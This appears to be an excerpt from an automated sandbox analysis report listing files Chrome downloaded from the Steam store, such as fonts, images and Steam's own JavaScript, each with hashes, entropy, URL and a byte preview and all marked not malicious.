        Preview:/*.. Font: ..Motiva Sans.. URL: ..http://www.youworkforthem.com/product.php?sku=T2982.. Foundry: .Niramekko.. Foundry: .http://www.youworkforthem.com/designer/293/niramekko.. Copyright:.Copyright 2011 by Rodrigo Saiani. All rights reserved... Version: .1.0.. Created:.August 09, 2012.. License: .http://www.youworkforthem.com/font-license.. License: .The WebFont(s) listed in this document must follow the YouWorkForThem..... WebFont license rules. All other parties are strictly restricted..... from using the WebFonts(s) listed without a purchased license...... All details above must always remain unaltered and visible in your CSS... */....@font-face {...font-family: 'Motiva Sans';...src: url('https://store.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-Regular.ttf?v=4.015') format('truetype');...font-weight: normal;...font-style: normal;..}....@font-face {...font-family: 'Motiva Sans';...src: url('https://store.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-Light.tt
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):2328
        Entropy (8bit):7.555918838161833
        Encrypted:false
        SSDEEP:48:yMYLNn2DEhVBJ3e8/WQeWrDjZwOdwxEVkN7ketfv66EIPfWba:3YR2YhV28/rRZwOuxES7ketfZEIPfW+
        MD5:82448BB30D23DD3B6C608B1EEE1CFEC1
        SHA1:2116595CF7B75BB465E74111143A4E237C3B2158
        SHA-256:D43D84DEEAB966F91D3030CA8CA0673E3B3AA382A4520390F99E088083985F43
        SHA-512:FDF38AD5151F723155A495D000018C0ED13BD94D70CFF49E28AEDC454BE312FD5AC52FFDD2B177F4B3F8746F83F8CAB9DFC29441FFC9B06A886429AD90E2D1A7
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR...@...@......iq.....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2019 (Windows)" xmpMM:InstanceID="xmp.iid:F5229F72662211E9BA37C08DBFA005FB" xmpMM:DocumentID="xmp.did:F5229F73662211E9BA37C08DBFA005FB"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:F5229F70662211E9BA37C08DBFA005FB" stRef:documentID="xmp.did:F5229F71662211E9BA37C08DBFA005FB"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.g......IDATx..[h\U..g.D.dh....J.[LA.b%.H.A.....>4.....o..}.)....i.*B.J#*..)U.`#..:.iQz...^.....tz.........C&.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x337, components 3
        Category:downloaded
        Size (bytes):124353
        Entropy (8bit):7.97763339842992
        Encrypted:false
        SSDEEP:3072:c7ee/63TWViQh35oo5Kwo5VVzKCQeQIMLvBYvsVdKO:w/6DWViQB5ojp1zK74MLJLVgO
        MD5:92F220FBBCEA5CB0E5B24E83413E71BA
        SHA1:1BA3A271E1C29043474A8CAE2F529564471EE218
        SHA-256:9E3BC77CE738534FEA3BBD1D8B85D477AB10EDAF31CEA25BE8DA7A87F91FCB29
        SHA-512:904C5BECD3D51C1A1369CA65E2ABA978CAEEE6EACDFA8FE0DE0F48651E26790F80B77EC6058E6419442EA95E8E833ABAD54C52C68AFD8B3487657E2B97BF1C07
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/2479810/ss_c5ef6a8c9db250e42a591caf963ddbb919802546.600x338.jpg
        Preview:......JFIF.............C....................................................................C.......................................................................Q.X............................................S.........................!.1.."AQ.a.2q.#B.....$34Rbr...567Cst..u.....%..S...Dv...................................=......................!.1.AQ."aq......2...#3B4.br$CR..D.S............?......).*^..U...:..+..F>%Rx.....E...."..?..8.!..T.?...b.i...T...4."*.s.k+&.....3.@....xBx...r%......`zE..e.S.GYCM.0.@.`..0|...>GN.a....H6#.4......^Kn.....1.,C.....U....h*....dh..0...ib.......... ...H..AX...[....o.u..&..T.RjM.V...kU..d1E....`2..(8...>o..."..x.../..U.....+I}...//..^.o!......U..U...H..].0.MvO.......n..j....TGY.3y.T....r..>...A...J.(8g:Ng..kw>H5.......9..9.E.}...af.Ny.>....[(.....Jy.....k:?SIm.tr[>..i..M=.F.....4[..9...'..PH.G0{N.;U_..(;.+>.f..O........0WO..Q=+*.....2....pA..u8@..c.G....Y.;I.22....zg.M/Kr..*5$7...L.L).'..Y..A..v......m.K"$......H.......&...
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x337, components 3
        Category:downloaded
        Size (bytes):90637
        Entropy (8bit):7.974951631570269
        Encrypted:false
        SSDEEP:1536:3GSOh65hm5bkmcKbabEQT1g2pMdbJwWq0CkMMwjky/J+vpj8a0Ge1SMD0ASZfSpT:3GGmWbDTWn1JwWpCmwoy/cZjMDFzrp
        MD5:813E363A0FE0257DC6FA058A8FFEFB9B
        SHA1:7981CC8C110B8784224DE5AD8236C4647C17DF41
        SHA-256:E549FBF811D11A50BEC7389C75979C826B97BA4A88E1F8EE92F572AC327A41FB
        SHA-512:E09137824CE896C671B4261551B8CD2A25730F9DD84315AACCBC54BA5DBABD2F1B614BDFEF290B2C64A73690ED14857AD9A939A2E20E4988D04ABEEC647B7654
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/2215430/ss_d60e16422fc1605181e0fedee3e2cfc1e02c750e.600x338.jpg
        Preview:......JFIF.............C....................................................................C.......................................................................Q.X............................................U.........................!.1..AQ."a.2q...#B.R...$3456brs....7tu....CS....8v.DE......................................@.......................!.1.AQa."q.2.....B....#..3R$4br..5C.D..............?..[.-:".SxzD..N..B.Z:.h.3.|....c.."...uY.YH.@.8..H..:...]]...e.|.P7.....:........H..Z:X.G...(.I.{..Z.P.k.!.d....!..-..T.Et.@x[........m..'.,+.L6.].V.@9......qn!aF..8..-.pF.....j...-.t.]G.v.......=.ZM..P.>_..U+.q..?R....w...'.#.0...l...?..v..{\V.}.I3O)..#2.~.......{>9Z..X6..*..9.G...p. ..l.\.6..r..9...%@....Ix.G......-N.L._....0N.#......r.........0.9...1......TdTnF.........t.....Ak.y..D..X.,2NZ=....}w...'XS.../qh......A..r+.....}6...eJ.........i!.bH.H.c.3.A6V.K|1.A.%........a....G.Y.Y..i.8.1.P8.I.I...#...&..q.k..$..B...8..989.......WM.q...N...Ttu(L2UC.4.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 115x65, components 3
        Category:dropped
        Size (bytes):3800
        Entropy (8bit):7.888824928639614
        Encrypted:false
        SSDEEP:96:vYCaNZSMidLMw1TtW42HRde+5rDVPfbry8Q5ljTLLH:paNML1TU4IPX5rDZHyzlfH
        MD5:EAB258C02D98827C6FC64763FEA5F730
        SHA1:E52DC1C16C0F4677DA7A604A93454E081C316C46
        SHA-256:574C1CD490945FE1112EA2083B0B9987BD6D5703544C8EDC6204AD4A954BA9E4
        SHA-512:ED038A92A931DF22152B749C195AEBB40D9E4D537FC747C57BF29DD286992943983CDE6B1EF8F1D9D63A9C6310E5CF65D450BCED76C7453D3C605A9D5CDCED21
        Malicious:false
        Reputation:low
        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................A.s............................................A.........................!..1A.".Qaq.#234r......s...5BC....7b...................................6.......................!1...2AQ."a....q.#4Bb..3r...............?..)..Hm..6.%)y.\........:.e."...oc=].....c.y...P.h...nS)R.)o.. ..r..........N......\.\.*.>...!.P.......*..p...>y.w...\8b..o..)...rLu.\Z.Zs....~..........W...~r.pt.....>n....V..2s.).l.<..u.;.....5c].VZ...Z<3...L...a......P...u.........<"y....o.)#>..t-^.z...1V.I.|.Z..&go.!..8.6.HR.0A...a..D[..ca.l.Hg.<.W.;.Q8...p....4x..s....MlM..JF}..yq1.4.>E.gPZ2...`..k.&..vS.S.1..kl.y.7....*:.G....G..`.ut.Q.dz.fg./.N....Z.6..[V...a.>.]_e...$...} ./\....g=.U.M.S.A[.6t..HB...../G.K.'b}7..U[..p>..!....~.cqWh.q)...?H.=.3.".+...'.OS.......8....i..5)-.B.....M!~T$...%X$.....jU.)N.NM4.$.3).Z....6.%.R.;.....^...
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 744 x 171, 8-bit/color RGBA, non-interlaced
        Category:downloaded
        Size (bytes):10863
        Entropy (8bit):7.893336023408476
        Encrypted:false
        SSDEEP:192:5ARjfa23tAJsqmbZEyI3ImwTHVeVUzp7C+22Z6XikPFffq0BV0FIZLKePlOoYWn4:5AfaItAJsfElI3jVwUzpC+JqNfC0wFIM
        MD5:A4E79C73EE13CB25B60FC4B0BA1F690C
        SHA1:B690C31B2EB1B0EB085E91AAAE7E79F03DEBE7C1
        SHA-256:6CB869DF089146C12EFB5E9C968E911C314842624BA6F052A11346AC734CADC8
        SHA-512:AAD423119F410A655F0AA475D2FE692087D7262C3986CE71347981C5B60F6A10031D7050BF9B9AEE4E7D84D814F0B8883C964028FCBE14ED3464602F3BA6CEC3
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
        Preview:.PNG........IHDR.............4.i{....sRGB.........gAMA......a.....pHYs..........o.d..).IDATx^...}U......|.hp(..%1..H.DQ..(..H..HF..H..(.B1...hP.B1.."1..")...(."..I.".x.....:.9.......>.c....~....>..c.....7O?..sDDDDD.....QDDDDD.......S...g.Nj..........h.EDDD.F........N;.B.r..!.%.phm.9.....\DDDdr4.25..].:/..?%4...a...}.H.........]..!..qm.....|m..]DDDdp4.24...$....R..>....{..y.""""..A.! .....C.s.....0......""""}.A.>...{Co.../,..K1._.Qt*"""r..t..r.?.z..l.`.?......tB...@^..Ctb...h...QuZ;....$.A.\..zW.cN.r..c!"._....""".....pY..C.$.'CD.?......N4..+B..1PH.CD....`DDDDZ..G.6...G.!........Bg......M4..r...".\....OB..../""".....&Dy...1..:.\.bJ......t9.....2..w"....&....H.....C..!...t0...Qu...Y(F..u._.4..C..v0.Z....."./.....:eu&%@..B....""".@LqY&.?RZ.^.I..(ty.....,....xA.^.....oCo..|u&""".G..,.......S.KC.b...Y../.".?.i...;....SDDDf..}.\."rNz...u...:.UDDd.h......)_?....z..LDDDf..}.."r.9....].......Ht..6D..I.3.#..l.EDDd.h.....9.2_..zG..........8;..|..9..wWg"""
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 306x260, components 3
        Category:downloaded
        Size (bytes):45706
        Entropy (8bit):7.973721562316231
        Encrypted:false
        SSDEEP:768:6eq4SUEXUkn9qIWtKR+n+rpEn6AbPUcBSr9xJAyNlI:6e7mUknXIKren6AJSB3Ab
        MD5:FBAC15CC71AD38851394CE62B9769ABE
        SHA1:3723B97BDCA23AC999300FF675949053C596628F
        SHA-256:8A379FA650EF9584A4280D1248C81D81FBD33E808A36912C3DBB7833823EAA66
        SHA-512:C5EFE0AAAD897A22C1495E4983C6484B3FBE9E4F24DF31BED6219C8B60AFA55E5AA74F8EE540D72D64A37E94C2A2235AD071B191874E9F88E7889209232A354A
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/spotlights/e859a74a694805aaf109456b/spotlight_image_english.jpg?t=1716487557
        Preview:......Exif..II*.................Ducky.......<......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.dba3da3b5, 2023/12/15-10:42:37 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:dfeb4610-6244-e148-8a22-5adb8a23da6d" xmpMM:DocumentID="xmp.did:F75C77F6192611EF9A75BEA82E65EE70" xmpMM:InstanceID="xmp.iid:F75C77F5192611EF9A75BEA82E65EE70" xmp:CreatorTool="Adobe Photoshop 25.7 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:dfeb4610-6244-e148-8a22-5adb8a23da6d" stRef:documentID="xmp.did:dfeb4610-6244-e148-8a22-5adb8a23da6d"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d.............................................
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:data
        Category:downloaded
        Size (bytes):391751
        Entropy (8bit):7.996686116738053
        Encrypted:true
        SSDEEP:6144:PM3jbCBxvscIvc9mWpl5vmJNvUO4B73TfUV3SfiTtTj0yNvTGkmKK8p/iQx:ETb2xUcWc9mIlReNvUOguSfxILGkmR8t
        MD5:A7C98D0A5A918EC364A7F5456307EBF6
        SHA1:C681BE87DD53EB3C563BFFA9E45FFEF8E161A8F3
        SHA-256:B90BAADD8DA0E9F13D633F2439D11CAC44E6CE64A1A3F013B64D6F0C2DC24B41
        SHA-512:5439FF391677A526ADE6167FD57FBA83C9496B19D978D0D47985EE4B21B57A341E592B304BBF28C526CAD2F1DE9159EB26AE76086B149AFE9DC35DC5F77C1C10
        Malicious:false
        Reputation:low
        URL:https://cdn.cloudflare.steamstatic.com/steam/apps/256923250/movie480_vp9.webm?t=1705420839:2f77e582f0cba3:7
        Preview:k.....Q.@w%...4DFBv.`.-)......*0.....<......x3...b%...t......;"........q...6i>...h..e\NP...k bIy.{..q~E.{I..[,.k|.].*.3H>....u..Su..ug^,...S4yR.v].P7...e.........#.8.UW.....o......../...u.1.'a....;.j/M..*.{`g.O..M'`T&....I..C.9p.,2=P?.#.c.....oX.NO...K.SIi_d...S8..Pk.0...2]...W.h...j...=..<Q.K...K%w..V#s)o.b.>a.....b.T\B.....PH:...>|I..^..l.T.(s*...*.....O..x'.st@..;A........H./......u........<.`...~3'T..t4./b..g.......Tv/.'j....@..z.rC.....=...{....k.r...#f........J...v..l.O...._".;.F...F....q.....I..a].[<.....M+.N..\ .0.i...%...........s...'.G...6`_:.5.oA....m.z+D.f......o..[..d..".5...`O.zD....05...S6s.g...\H*.X.c.q.U..5...Qr<.~.bG..w.~.j.]s..]jV...@.....Z....GK%.6_.W..t......i..}w....5...w............J2..glBV..-R.J..h.;I.x{.....}...h.9..C.e...H.P<,Vk.VG2.G(.?.%.=..g?.U.e...~...../.p.....3N..hrd.>k..#a)4..._3...u.0k.....z..1.D..=.....3..J.......N......X(.F'..Rv.....V...<.).p#5..H.H.M.@......rSd.p.v....DCI"..N=.kAA...T..s+B.).4....n'.|....
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (2612), with CRLF line terminators
        Category:downloaded
        Size (bytes):154404
        Entropy (8bit):5.337881533074874
        Encrypted:false
        SSDEEP:1536:D1l9Ah60MhmjGFh61e5lnl9bsPdVcTzWMnyN3qxVqGoteFANNfsflM6kQuOEmTMu:n0861e5/9b6dVcm9qVqZfrUEoIm
        MD5:444106254D61C24625741613608F5DA0
        SHA1:2D5B79109AB130C586F006EFF9B3132030E8EA83
        SHA-256:34E7C6C8A8962B8921E20C19BC00A204CACC2BC248D4A0663880EA7FFD03FD67
        SHA-512:96A6A6C6948DE8C819B552FCFA06F9BA13D8102C219E6E4C93D5913B6910AC13C78B1E3641A280377B7915A9BEF9A120C3EFE7B527885ADFF24BFFCFB0272CF7
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&l=english
        Preview:..Steam = {...sm_bInitialized: false,...sm_bUserInClient: false,...sm_bUserInGameOverlay: false,...sm_bUserInTenfootBrowser: false,...sm_bUserInMobileChat: false,...sm_bUserInMobileApp: false,.....BIsUserInSteamClient: function()...{....if ( !Steam.sm_bInitialized ).....Steam.Init();......return Steam.sm_bUserInClient;...},.....BIsUserInGameOverlay: function()...{....if ( !Steam.sm_bInitialized ).....Steam.Init();......return Steam.sm_bUserInGameOverlay...},.....BIsUserInSteamTenfootBrowser: function()...{....if ( !Steam.sm_bInitialized ).....Steam.Init();......return Steam.sm_bUserInTenfootBrowser;...},.....BIsUserInClientOrOverlay: function()...{....if ( !Steam.sm_bInitialized ).....Steam.Init();......return Steam.sm_bUserInClient || Steam.sm_bUserInGameOverlay;...},.....BIsUserInSteamMobileChat: function()...{....if ( !Steam.sm_bInitialized ).....Steam.Init();......return Steam.sm_bUserInMobileChat;...},.....BIsUserInSteamMobileApp: function()...{....if ( !Steam.sm_bInitialized )...
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3650), with CRLF, LF line terminators
        Category:downloaded
        Size (bytes):613292
        Entropy (8bit):5.430539126228188
        Encrypted:false
        SSDEEP:12288:NpW9yy5QLq6QmAXX6JcBvlrNsDPIsBqee9EEs6/+9BLVIuTbJQuPnwWCHWBKkFCz:NyV
        MD5:FF7C9A66615C46759B74E3702AA792AD
        SHA1:B31E922B62D60389519BC9BE46A8FCD75C29245F
        SHA-256:5DA55F22B23BE5EE8FB7EAFF1C02B5E1B3B395C38A7F129D1F87B58BD90A8F9A
        SHA-512:3B1BE4B73F71AF041DB1629719DF023B24F34EB11D2CC279A3A96B8EE1931FA9258F580A2CB931B3D2898C3CF0C99384C52FB64CE9E7088865360B7263742D34
        Malicious:false
        Reputation:low
        URL:https://store.steampowered.com/?snr=1_5_9__global-responsive-menu
        Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Welcome to Steam</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://store.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=Rc2hpzg2Ex3T&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://store.akamai.steamstatic.com/public/shared/css/shared_global.css?v=2hTL2X8NwbqX&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://store.akamai.steamstatic.com/public/shared/css/buttons.css?v=CrrkDubPqLcq&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://store.akamai.steamstatic.com/public/css/v6/store.css?v=7b2ei1laGOqu&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://store.akamai.steamstatic.com/public
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:TrueType Font data, digitally signed, 18 tables, 1st "DSIG", 24 names, Macintosh, Copyright \251 2012, 2017, 2020 by Plau. All rights reserved.Motiva SansLight4.015;Plau;MotivaSa
        Category:downloaded
        Size (bytes):122660
        Entropy (8bit):6.047516179670634
        Encrypted:false
        SSDEEP:3072:XnN/O/ceJkGwg/MOAibD2hPfX4HYhDhudcvObkSafj9:9/O/ceJkGwg/MOAib6nX44NhIWOb8fh
        MD5:D45F521DBA72B19A4096691A165B1990
        SHA1:2A08728FBB9229ACCCBF907EFDF4091F9B9A232F
        SHA-256:6B7A3177485C193A2E80BE6269B6B12880E695A8B4349F49FCCF87F9205BADCC
        SHA-512:9262847972A50F0CF8FC4225C6E9A72DBF2C55CCBCC2A098B7F1A5BD9EA87502F3C495A0431373A3C20961439D2DAE4AF1B1DA5B9FADE670D7FCAED486831D8C
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-Light.ttf?v=4.015
        Preview:........... DSIG............GDEF...4...,...@GPOS..n)...l..ujGSUB.d....v.....OS/2t.....|...`cmap.d..........cvt F).....d....fpgm.6!....,....gasp.......\....glyf...d...l....head...A...$...6hhea...+...\...$hmtxv.x.........loca..g....h....maxp........... name.\....0....post............prep.......D...................................s...t.u...v......./......... .Q...........D..DFLT..latn. .................!.:..AZE .HCAT .VCRT .dKAZ .rMOL ..NLD ..ROM ..TAT ..TRK ...............".............#.............$.............%.............&.............'.............(.............).............*........... .+.,cpsp..cpsp..cpsp..cpsp..cpsp."cpsp.(cpsp..cpsp.4cpsp.:cpsp.@cpsp.Fkern.Lkern.Tkern.\kern.dkern.lkern.tkern.|kern..kern..kern..kern..mark..mark..mark..mark..mark..mark..mark..mark..mark..mark..mark..mkmk..mkmk..mkmk..mkmk..mkmk..mkmk..mkmk."mkmk.,mkmk.6mkmk.@mkmk.J..................................................................................................................................
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 115x65, components 3
        Category:downloaded
        Size (bytes):3154
        Entropy (8bit):7.850028804831712
        Encrypted:false
        SSDEEP:96:vWDB/D3QRjh+HwFXPEt+ojwsmZ7CH9hN7kQyPo+qmr:6BDQRjSwFXssmVdyPjqmr
        MD5:6E3C210FD7755AAFE2CDCFF260A2804E
        SHA1:4A713251BB775DCB3E692F88DF38C1EC44A9B909
        SHA-256:0956E6592CFFC0036FB10D425D225FF1DCA47D518CA24155058DD520CF45807A
        SHA-512:1D5A69D3F8E0CA7F8F98EA8D8985F4B73212F995F5A6BCA96020DDE64C8D48C59D5A176FF5D400B13156EB963EC37D0A2334236889989E376C7138B49B99C1B6
        Malicious:false
        Reputation:low
        URL:https://cdn.cloudflare.steamstatic.com/steam/apps/1643320/ss_1a6fc1eb82bbb4715c8d06b9866c1f92d1c5c51d.116x65.jpg?t=1705420866
        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................A.s............................................=..........................!.1AQq..."a.23B.4r.....C..%bs..................................)......................!.1AQ."qa...2................?....U...y.P|Yx...~......Yk!b....&'......P.....).g.z..Db.,a.........Q.X...o...;Kg.R...Q:".J2"..3.V7/0..6.._Z+....tP.!.;.._V..#.[VP....&Y.r..Z..UYn.(K..[.......)I.G/....WVR.v..Hw2.%X.....T.....4.~j-..\&..*.)^Fh..$........<.@.]z..2..k...3.z.8hd.C..'w..X......)a.C.*R.u_J..zc...:..x.X..Z.D.pe....F...s...G.rM.$Tz...gO.gU4}%.D.fS.9..rdxc.Bcb..N.......n..P.....A.m..2..L.G.P.*e.Y..m.$(.e$6..Wh^..8..%*E.X.wg./..\..{TU.&.;....oH.UX(^;.c..t.....`.2&...7..0....v...>.^k....;..VH..H.........x.3.5..?T.....)*....h...f!.vy..v....7'..x...)....&Y._h...g.W)....*..J..FeC.|..\[..U.9d.m...L.2...7......x.w.....1..\..f..BV.1......c
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:SVG Scalable Vector Graphics image
        Category:downloaded
        Size (bytes):3684
        Entropy (8bit):4.780503743341751
        Encrypted:false
        SSDEEP:96:CXQSfzclE2Bc4N/waCVAh+m8CE2n1HNBRjVO2PGPLYOgzypH6YB:WQAzSE2BB9/c1CEEtoFUOgzs6YB
        MD5:B7A7E43284E2FFE806AC1BC27C1F6A87
        SHA1:E8196489E2AE99EC6EB33995B5A3E108D6E44DE0
        SHA-256:C3A7C646A1305017F22423030CB5A12ACC9F96B64013DCEF7AEB80567B542CBB
        SHA-512:757E4F382A864CAC9F975220C28586F5EA415B2E2215375C1A47E011A9190FCD15313D399007539F150A6DF0378B8F2022AC88E995693AB03A9F5656BFE40832
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
        Preview:<?xml version="1.0" encoding="utf-8"?>.. Generator: Adobe Illustrator 16.0.0, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->..<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">..<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"... width="355.666px" height="89.333px" viewBox="0 0 355.666 89.333" enable-background="new 0 0 355.666 89.333"... xml:space="preserve">..<g>...<path fill="#C5C3C0" d="M44.238,0.601C21,0.601,1.963,18.519,0.154,41.29l23.71,9.803c2.009-1.374,4.436-2.179,7.047-2.179....c0.234,0,0.467,0.008,0.698,0.021l10.544-15.283c0-0.073-0.001-0.144-0.001-0.216c0-9.199,7.483-16.683,16.683-16.683....c9.199,0,16.682,7.484,16.682,16.683c0,9.199-7.483,16.684-16.682,16.684c-0.127,0-0.253-0.003-0.379-0.006l-15.038,10.73....c0.008,0.195,0.015,0.394,0.015,0.592c0,6.906-5.617,12.522-12.522,12.522c-6.061,0-11.129-4.326-12.277-10.055L1.678,56.893....c5.25,18.5
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 292x136, components 3
        Category:downloaded
        Size (bytes):20501
        Entropy (8bit):7.961211242674229
        Encrypted:false
        SSDEEP:384:fqUNJkz58TQGWKxI73FBkZDEHIZZRI3c73RBmUW8GiYv35EGayu7loAyMb:7NJkzlxRBksIRI3c73RBE8GBvGGg7lq+
        MD5:6E078767201EC87C7FB3C53772DA6925
        SHA1:F9A1EC97C0D4F16F23C5CE4A572922661BE896F7
        SHA-256:88E10412739146DACB1CC26A0FBE7B95DA3880769B7C58AF75291DADE84272C5
        SHA-512:D95B4FFE7587936425DC458E94CFD2106DE1B03D9E033D91EF9AD93E17265CEDB4A6AD26FF4E127AE6795B3FB0AA72BA82F22472B1F691E25AC73A7F470861FE
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/1942110/header_292x136.jpg?t=1716236031
        Preview:......JFIF.............C....................................................................C.........................................................................$............................................@..........................!..1A."Qa.q...#2B...$3R....Cbr....c.................................9........................!1AQ.."aq......#2B...$3b.%4r.............?...4.FS...%HJ...[z.......:.....~..K.........H.;t.-x.KI.#*,..5b.F.c.........@R..eJ6I..Ea....v..k.m.).).:..a...W.JM4....b>...@.....a.. ....!y..f..EiI...|..}.r8.Q..dp4...m.....(=..V..*.3/b............`G5TV......c_...[.....8ZB..ll0P^w.-..v....dXa....At.Bn.m....&81.B...w......?.m..EA".!.....^.TA.........Q.[*.M7e&:.........!B]U.l..........*K.Q..._.YJ)t}!d.....P....n}0`.%...J~^. .........0...>...s."..#........xy.!.).. R ..j...|. ..rJ..|p.... ....hI:... . P..\...hV.....:<.a..3.....t...*.....#H.T..L..b[..Y.w.....8..p+...)aj:.N..(.....h.Q_$.....aB...H.^..N...9I....'...2.b._....Ij!JlF9.e.w...Y
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:Unicode text, UTF-8 text, with very long lines (24681), with CRLF line terminators
        Category:downloaded
        Size (bytes):60854
        Entropy (8bit):5.237035743895263
        Encrypted:false
        SSDEEP:1536:AEJpvhd5dY0KEApMyw+l/oOJz9owymlgaUYCOlb+OeaLJIt:AEr5n6EhZkyuLJIt
        MD5:BF7E930C75C0FEC002110E9B34D8AA7D
        SHA1:92EAB00D40336B37E15583EF5D385B6B4E7A0A61
        SHA-256:FB1E3D2F0CB6E7D4E141CA84C8119F9A544C822B0BAF2F94F3073B84576770D8
        SHA-512:BE289CA1EA1355D5AA7508F145A4323FE20F875957CCB410222B7A8258ED4F3E8AFF72D00B1DA20CD04F8A7EFF3FC66C91FBF40EFAD877AED609DBFB039D4449
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/shared/javascript/login.js?v=v36TDHXA_sAC&l=english
        Preview:"use strict";....function CLoginPromptManager( strBaseURL, rgOptions )..{...// normalize with trailing slash...this.m_strBaseURL = strBaseURL + ( strBaseURL.substr(-1) == '/' ? '' : '/' ) + ( this.m_bIsMobile ? 'mobilelogin' : 'login' ) + '/';...this.m_strSiteBaseURL = strBaseURL; // Actual base url, not the login base url above......// read options...rgOptions = rgOptions || {};...this.m_bIsMobile = rgOptions.bIsMobile || false;...this.m_strMobileClientType = rgOptions.strMobileClientType || '';...this.m_strMobileClientVersion = rgOptions.strMobileClientVersion || '';...this.m_bIsMobileSteamClient = ( this.m_strMobileClientType ? true : false );...this.m_bMobileClientSupportsPostMessage = rgOptions.bMobileClientSupportsPostMessage || false;.....this.m_$LogonForm = $JFromIDOrElement( rgOptions.elLogonForm || document.forms['logon'] );.....this.m_fnOnFailure = rgOptions.fnOnFailure || null;...this.m_fnOnSuccess = rgOptions.fnOnSuccess || null;.....this.m_strRedirectURL = rgOptions.strRe
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x337, components 3
        Category:downloaded
        Size (bytes):67839
        Entropy (8bit):7.980698257786121
        Encrypted:false
        SSDEEP:1536:Iodm4YRVtb0RUgMwY9AIsIrN7NTFAwTUuU0X/szJ9PizDYX4xHB7:IiYRVR0OCY9Ds+7JiwYuUM/c7iz8X4xZ
